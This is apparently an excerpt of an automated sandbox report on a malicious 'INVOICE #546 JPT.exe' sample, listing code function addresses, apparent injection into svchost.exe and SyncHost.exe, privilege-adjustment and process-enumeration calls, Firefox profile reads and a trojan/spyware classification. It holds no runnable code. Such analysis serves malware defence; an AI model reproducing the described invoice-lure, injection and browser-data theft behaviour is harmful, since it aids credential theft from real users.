Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_006403DA 0_2_006403DA
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005F242E 0_2_005F242E
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005E25FA 0_2_005E25FA
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0061E616 0_2_0061E616
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005D66E1 0_2_005D66E1
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005CE6A0 0_2_005CE6A0
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005F878F 0_2_005F878F
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005F6844 0_2_005F6844
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00640857 0_2_00640857
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005D8808 0_2_005D8808
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00628889 0_2_00628889
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005ECB21 0_2_005ECB21
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005F6DB6 0_2_005F6DB6
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005D6F9E 0_2_005D6F9E
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005D3030 0_2_005D3030
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005EF1D9 0_2_005EF1D9
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005E3187 0_2_005E3187
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005C1287 0_2_005C1287
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005E1484 0_2_005E1484
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005D5520 0_2_005D5520
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005E7696 0_2_005E7696
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005D5760 0_2_005D5760
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005E1978 0_2_005E1978
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005F9AB5 0_2_005F9AB5
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005CFCE0 0_2_005CFCE0
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00647DDB 0_2_00647DDB
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005E1D90 0_2_005E1D90
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005EBDA6 0_2_005EBDA6
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005CDF00 0_2_005CDF00
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005D3FE0 0_2_005D3FE0
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0110A358 0_2_0110A358
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00418DF3 1_2_00418DF3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E8D7 1_2_0040E8D7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E8E3 1_2_0040E8E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004028AC 1_2_004028AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004028B0 1_2_004028B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403130 1_2_00403130
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401260 1_2_00401260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402C22 1_2_00402C22
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402C30 1_2_00402C30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00410570 1_2_00410570
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00410573 1_2_00410573
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004025C0 1_2_004025C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042F5D3 1_2_0042F5D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004025BF 1_2_004025BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416FEE 1_2_00416FEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416FF3 1_2_00416FF3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00410793 1_2_00410793
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E793 1_2_0040E793
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FA352 1_2_035FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036003E6 1_2_036003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354E3F0 1_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274 1_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C02C0 1_2_035C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C8158 1_2_035C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DA118 1_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03530100 1_2_03530100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F81CC 1_2_035F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036001AA 1_2_036001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F41A2 1_2_035F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D2000 1_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03564750 1_2_03564750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770 1_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353C7C0 1_2_0353C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355C6E0 1_2_0355C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540535 1_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03600591 1_2_03600591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F2446 1_2_035F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E4420 1_2_035E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EE4F6 1_2_035EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FAB40 1_2_035FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F6BD7 1_2_035F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353EA80 1_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03556962 1_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0360A9A6 1_2_0360A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354A840 1_2_0354A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03542840 1_2_03542840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E8F0 1_2_0356E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035268B8 1_2_035268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B4F40 1_2_035B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03560F30 1_2_03560F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E2F30 1_2_035E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03582F28 1_2_03582F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03532FC8 1_2_03532FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354CFE0 1_2_0354CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BEFA0 1_2_035BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540E59 1_2_03540E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FEE26 1_2_035FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FEEDB 1_2_035FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03552E90 1_2_03552E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FCE93 1_2_035FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DCD1F 1_2_035DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354AD00 1_2_0354AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353ADE0 1_2_0353ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03558DBF 1_2_03558DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540C00 1_2_03540C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03530CF2 1_2_03530CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0CB5 1_2_035E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352D34C 1_2_0352D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F132D 1_2_035F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0358739A 1_2_0358739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355B2C0 1_2_0355B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E12ED 1_2_035E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035452A0 1_2_035452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0360B16B 1_2_0360B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352F172 1_2_0352F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0357516C 1_2_0357516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354B1B0 1_2_0354B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EF0CC 1_2_035EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035470C0 1_2_035470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F70E9 1_2_035F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FF0E0 1_2_035FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FF7B0 1_2_035FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03585630 1_2_03585630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F16CC 1_2_035F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F7571 1_2_035F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036095C3 1_2_036095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DD5B0 1_2_035DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03531460 1_2_03531460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FF43F 1_2_035FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FFB76 1_2_035FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B5BF0 1_2_035B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0357DBF9 1_2_0357DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355FB80 1_2_0355FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FFA49 1_2_035FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F7A46 1_2_035F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B3A6C 1_2_035B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EDAC6 1_2_035EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DDAAC 1_2_035DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03585AA0 1_2_03585AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E1AA3 1_2_035E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03549950 1_2_03549950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355B950 1_2_0355B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D5910 1_2_035D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AD800 1_2_035AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035438E0 1_2_035438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FFF09 1_2_035FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03503FD2 1_2_03503FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03503FD5 1_2_03503FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03541F92 1_2_03541F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FFFB1 1_2_035FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03549EB0 1_2_03549EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F1D5A 1_2_035F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03543D40 1_2_03543D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F7D73 1_2_035F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355FDC0 1_2_0355FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B9C32 1_2_035B9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FFCF2 1_2_035FFCF2
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05130535 5_2_05130535
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051F0591 5_2_051F0591
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051D4420 5_2_051D4420
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051E2446 5_2_051E2446
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051DE4F6 5_2_051DE4F6
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05154750 5_2_05154750
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05130770 5_2_05130770
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0512C7C0 5_2_0512C7C0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0514C6E0 5_2_0514C6E0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051CA118 5_2_051CA118
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05120100 5_2_05120100
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051B8158 5_2_051B8158
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051F01AA 5_2_051F01AA
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051E41A2 5_2_051E41A2
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051E81CC 5_2_051E81CC
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051C2000 5_2_051C2000
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EA352 5_2_051EA352
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0513E3F0 5_2_0513E3F0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051F03E6 5_2_051F03E6
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051D0274 5_2_051D0274
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051B02C0 5_2_051B02C0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051CCD1F 5_2_051CCD1F
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0513AD00 5_2_0513AD00
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05148DBF 5_2_05148DBF
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0512ADE0 5_2_0512ADE0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05130C00 5_2_05130C00
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051D0CB5 5_2_051D0CB5
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05120CF2 5_2_05120CF2
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05150F30 5_2_05150F30
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051D2F30 5_2_051D2F30
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05172F28 5_2_05172F28
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051A4F40 5_2_051A4F40
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051AEFA0 5_2_051AEFA0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05122FC8 5_2_05122FC8
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0513CFE0 5_2_0513CFE0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EEE26 5_2_051EEE26
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05130E59 5_2_05130E59
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05142E90 5_2_05142E90
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051ECE93 5_2_051ECE93
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EEEDB 5_2_051EEEDB
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05146962 5_2_05146962
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051329A0 5_2_051329A0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051FA9A6 5_2_051FA9A6
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0513A840 5_2_0513A840
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05132840 5_2_05132840
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051168B8 5_2_051168B8
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0515E8F0 5_2_0515E8F0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EAB40 5_2_051EAB40
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051E6BD7 5_2_051E6BD7
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0512EA80 5_2_0512EA80
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051E7571 5_2_051E7571
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051CD5B0 5_2_051CD5B0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EF43F 5_2_051EF43F
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05121460 5_2_05121460
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EF7B0 5_2_051EF7B0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051E16CC 5_2_051E16CC
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0511F172 5_2_0511F172
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051FB16B 5_2_051FB16B
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0516516C 5_2_0516516C
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0513B1B0 5_2_0513B1B0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051DF0CC 5_2_051DF0CC
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051370C0 5_2_051370C0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051E70E9 5_2_051E70E9
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EF0E0 5_2_051EF0E0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051E132D 5_2_051E132D
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0511D34C 5_2_0511D34C
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0517739A 5_2_0517739A
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051352A0 5_2_051352A0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0514B2C0 5_2_0514B2C0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051D12ED 5_2_051D12ED
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051E1D5A 5_2_051E1D5A
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05133D40 5_2_05133D40
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051E7D73 5_2_051E7D73
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0514FDC0 5_2_0514FDC0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051A9C32 5_2_051A9C32
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EFCF2 5_2_051EFCF2
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EFF09 5_2_051EFF09
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05131F92 5_2_05131F92
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EFFB1 5_2_051EFFB1
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05139EB0 5_2_05139EB0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051C5910 5_2_051C5910
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05139950 5_2_05139950
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0514B950 5_2_0514B950
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0519D800 5_2_0519D800
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051338E0 5_2_051338E0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EFB76 5_2_051EFB76
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0514FB80 5_2_0514FB80
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051A5BF0 5_2_051A5BF0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_0516DBF9 5_2_0516DBF9
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051EFA49 5_2_051EFA49
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051E7A46 5_2_051E7A46
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051A3A6C 5_2_051A3A6C
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051CDAAC 5_2_051CDAAC
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05175AA0 5_2_05175AA0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051D1AA3 5_2_051D1AA3
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051DDAC6 5_2_051DDAC6
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DA2370 5_2_02DA2370
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DBC220 5_2_02DBC220
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D9B3E0 5_2_02D9B3E0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D9D3E0 5_2_02D9D3E0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D9D1C0 5_2_02D9D1C0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D9D1BD 5_2_02D9D1BD
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DAF490 5_2_02DAF490
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D9B530 5_2_02D9B530
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D9B524 5_2_02D9B524
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DA5A40 5_2_02DA5A40
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DA3C40 5_2_02DA3C40
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DA3C3B 5_2_02DA3C3B
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_04E4E423 5_2_04E4E423
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_04E4E7BD 5_2_04E4E7BD
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_04E4E304 5_2_04E4E304
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_04E4D888 5_2_04E4D888
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: String function: 005C7DE1 appears 36 times
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: String function: 005E0AE3 appears 70 times
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: String function: 005E8900 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 035AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03587E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0352B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03575130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 035BF290 appears 105 times
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: String function: 051AF290 appears 105 times
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: String function: 05165130 appears 58 times
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: String function: 05177E54 appears 102 times
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: String function: 0511B970 appears 280 times
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: String function: 0519EA12 appears 86 times
Source: INVOICE #546 JPT.exe, 00000000.00000003.1310199072.0000000003CBD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs INVOICE #546 JPT.exe
Source: INVOICE #546 JPT.exe, 00000000.00000003.1310462527.0000000003B13000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs INVOICE #546 JPT.exe
Source: INVOICE #546 JPT.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@5/4
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0062A06A GetLastError,FormatMessageW, 0_2_0062A06A
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_006181CB AdjustTokenPrivileges,CloseHandle, 0_2_006181CB
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_006187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_006187E1
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0062B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_0062B333
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0063EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_0063EE0D
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_006383BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 0_2_006383BB
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005C4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_005C4E89
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe File created: C:\Users\user\AppData\Local\Temp\aut98C7.tmp Jump to behavior
Source: INVOICE #546 JPT.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
